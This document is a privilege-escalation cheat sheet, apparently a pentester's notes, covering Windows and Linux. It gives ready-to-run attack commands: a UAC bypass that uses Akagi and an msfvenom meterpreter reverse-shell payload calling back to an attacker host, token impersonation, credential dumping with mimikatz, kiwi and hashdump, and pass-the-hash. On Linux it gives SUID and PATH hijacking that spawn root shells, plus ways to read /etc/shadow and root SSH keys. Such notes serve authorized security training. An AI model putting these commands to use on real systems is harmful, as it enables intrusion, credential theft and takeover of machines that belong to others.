Privilege Escalation


Note: if you have a valid user credential you can authenticate in windows target from SMB, RDP, WinRM.

Automation script

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

UAC Bypass

User Account Control (UAC) is a feature that enables a consent prompt for elevated activities.


  1. User must be a member of the Administrators group. net localgroup administrators

  2. Full interactive shell with the victim like meterpreter (a common nc.exe shell is not enough).

(1) Metasploit

search bypassuac


# 1. Step
migrate <PID explorer.exe>

# 2. Step - Upload Akagi (Akagi64.exe if x64)

# 3. Step - Create payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o backdoor.exe

# 4. Step - Start a listener (exploit/multi/handler)

# 5. Step - Run Akagi
Akagi64.exe 23 <payload_full_path> # NOTE FULL PATH

# Once run, we will get meterpreter session - getprivs/getsystem to get elevated privs

Impersonate Tokens

Metasploit - incognito

load incognito
list_tokens -u
 Delegation Tokens Available
 Impersonation Tokens Available
 No tokens available
impersonate_token <token_name>
# E.g. impersonate_token ANYTHING\\Administrator 
# Note: the two backslashes
# You may need to migrate process to a <user> process
# PID: 2948 | PPID: 2036 NAME: explorer.exe | ARCH: X64 | SESSION:1 | USER: ANYTHING\Administrator | PATH: C:\Windows\explorer.exe

# Migrate process
migrate 2948

Password in configuration file (Unattend.xml)

An answer file is an XML-based file that contains setting definitions and values to use during Windows Setup. Answer files (or Unattend files) are used by Administrators when they are setting up fresh images as it allows for an automated setup for Windows systems.


Extract password and decode it (from base64)

Credential Dumping (Mimikatz - Kiwi - Hashdump)

Prerequisites: User must be a member a local Administrators.

(1) hashdump (Metasploit - Meterpreter)

# You may need to migrate meterpreter to NT AUTHORITY\SYSTEM process
migrate <PID explorer.exe>

(2) Kiwi (Metasploit - Meterpreter)

# You may need to migrate meterpreter to NT AUTHORITY\SYSTEM process
migrate <PID explorer.exe>

load kiwi
# Retrieve all credentials (parsed)
# NTLM hashes for all of the user accounts on the system
# Find the clear text passwords
# Note: from the Windows version 8.0+, windows don’t store any plain text password.
# So, it can be helpful for the older version of the Windows.

(3) Mimikatz

# 1. Upload mimikatz.exe

# 2. Execute

:: Get debug rights. This should be a standard for running mimikatz as it needs local administrator access
:: This should return Privilege '20' OK.

:: NTLM hashes for all of the user accounts on the system
:: To find the clear text passwords, but it's not always possible

Pass the Hash

# 1. Method
crackmapexec smb <ip> -u <administrator> -H <NTLM hash> -x "ipconfig"

# 2. Method (Metasploit) -> windows/smb/psexec
set SMBPass <LM hash>:<NTLM hash>


  • Empty LM hash: AAD3B435B51404EEAAD3B435B51404EE (means its non-use).

    • AAD3B435B51404EEAAD3B435B51404EE:<NTLM>

  • With hashdump you have the right format


  • Powershell History

  • Saved Windows Credentials

    • cmdkey /list

    • runas /savecred /user:admin cmd.exe

  • Scheduled Tasks

  • Insecure Permissions on Service Executable

  • Unquoted Service Paths

  • Insecure Service Permissions

  • Windows Privileges

  • Unpatched Software


Vulnerable program

Search scripts that execute programs or programs. Search for any vulnerable version. One example: chkrootkit v0.49 (running as root)

ps aux

Weak Permissions

# World-writable files - Ex: maybe you can edit shadow file
find / -not -type l -perm -o+w


sudo -l
# Search on how to exploit

SUID - custom binary

Premise: you have binary_name (with suid) that use/load/execute loaded_binary

Extract strings from the binary – look for shared libraries or binaries being loaded / executed at runtime

strings binary_name

(1) Method

cp /bin/bash /path/to/loaded_binary

(2) Method

Delete the loaded binary and replace with a new one:

#include <stdio.h>
#include <stdlib.h>

int main() {
    system("/bin/bash -i"); 
    return 0;
# Compile
gcc binary.c -o <loaded_binary>
# Run the binary


  • sudo -l

    • setenv?


  • Look for capabilities

  • History Files

  • Docker group

  • Cron jobs

  • SSH Keys

  • PATH

  • NFS

  • Writable /etc/shadow

  • Writable /etc/passwd

  • Are there scripts that use commands?

    • If the command is executed without full path you can modify PATH variable

    • strings <program_name>

    • you see tail -f /var/log/nginx/access.log

    • #!/bin/bash
      /bin/bash -p
    • chmod +x /tmp/tail

    • export PATH=/tmp:$PATH

    • ./<program_name>

  • Is there a database? Can I access to it?

    • Look at config file or source code of webpages connecting to db

  • Look at the source code of the php,py,jsp ... files of the website

    • Especially login files. Any password?

  • Writable authorized_key folder?

    • generate new ssh keys

  • Can I read some file with sudo?

    • /root/root.txt, /etc/shadow, /root/.ssh/id_rsa

  • Can I write a file in the root user directory?

    • generate ssh key with ssh-keygen and save it in the root user dir

  • Kernel Exploits


Last updated